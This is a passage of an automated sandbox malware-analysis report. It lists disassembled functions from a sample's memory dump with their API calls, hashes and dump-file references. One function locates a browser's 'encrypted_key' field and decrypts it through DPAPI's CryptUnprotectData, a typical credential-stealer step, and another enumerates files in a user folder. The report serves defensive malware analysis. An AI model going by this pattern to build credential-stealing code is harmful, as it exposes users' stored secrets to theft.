                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EE9D39
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9AEF
                        • Part of subcall function 00EE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B01
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9B2A
                        • Part of subcall function 00EE9AC0: LocalFree.KERNEL32(?,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B3F
                        • Part of subcall function 00EE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE9B84
                        • Part of subcall function 00EE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EE9BA3
                        • Part of subcall function 00EE9B60: LocalFree.KERNEL32(?), ref: 00EE9BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 86df546b8c09946299ee753da2699f56816311e5b981488600e5e2f0116aa538
                      • Instruction ID: 637f2b905718b4316c50d0a7f4d0ac966c047aecb0ef600301d194d55f354f0c
                      • Opcode Fuzzy Hash: 86df546b8c09946299ee753da2699f56816311e5b981488600e5e2f0116aa538
                      • Instruction Fuzzy Hash: 12312CB6D1021DABCF14DBE5DC85AEEB7F8AB48304F145519EA05B7242EB309A04CBA1
                      Function 00EFC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 00EFC74E
                        • Part of subcall function 00EFBF9F: __amsg_exit.LIBCMT ref: 00EFBFAF
                      • __getptd.LIBCMT ref: 00EFC765
                      • __amsg_exit.LIBCMT ref: 00EFC773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00EFC797
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 7fd9f046e01f088eba22c49d6cb3be0a40778a34e974de04f40504cee77fdab6
                      • Instruction ID: fa5c7443c8f773e1db080e1bfc23aa2442b07fccd3924a9c5c8bfda79986c346
                      • Opcode Fuzzy Hash: 7fd9f046e01f088eba22c49d6cb3be0a40778a34e974de04f40504cee77fdab6
                      • Instruction Fuzzy Hash: 2CF09A32A0430C9BD720BBB89D06B7A33E06F00724F38614AF714BA1D2EB685940EE56
                      Function 00EF4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4F7A
                      • lstrcat.KERNEL32(?,00F01070), ref: 00EF4F97
                      • lstrcat.KERNEL32(?,01688848), ref: 00EF4FAB
                      • lstrcat.KERNEL32(?,00F01074), ref: 00EF4FBD
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF492C
                        • Part of subcall function 00EF4910: FindFirstFileA.KERNEL32(?,?), ref: 00EF4943
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FDC), ref: 00EF4971
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FE0), ref: 00EF4987
                        • Part of subcall function 00EF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF4B7D
                        • Part of subcall function 00EF4910: FindClose.KERNEL32(000000FF), ref: 00EF4B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: e37753494342747cfa61acddef57abf8f6a4de2c72e5d8269885bde1cdad3cf1
                      • Instruction ID: e44d6de87bc77bf7fec5ec0c20c50523dc2c52096ccc92c6d930b903fa029546
                      • Opcode Fuzzy Hash: e37753494342747cfa61acddef57abf8f6a4de2c72e5d8269885bde1cdad3cf1
                      • Instruction Fuzzy Hash: 012188B690020877C778FB60EC46EEE377CAB94300F404594F659A7585EEB496D88B92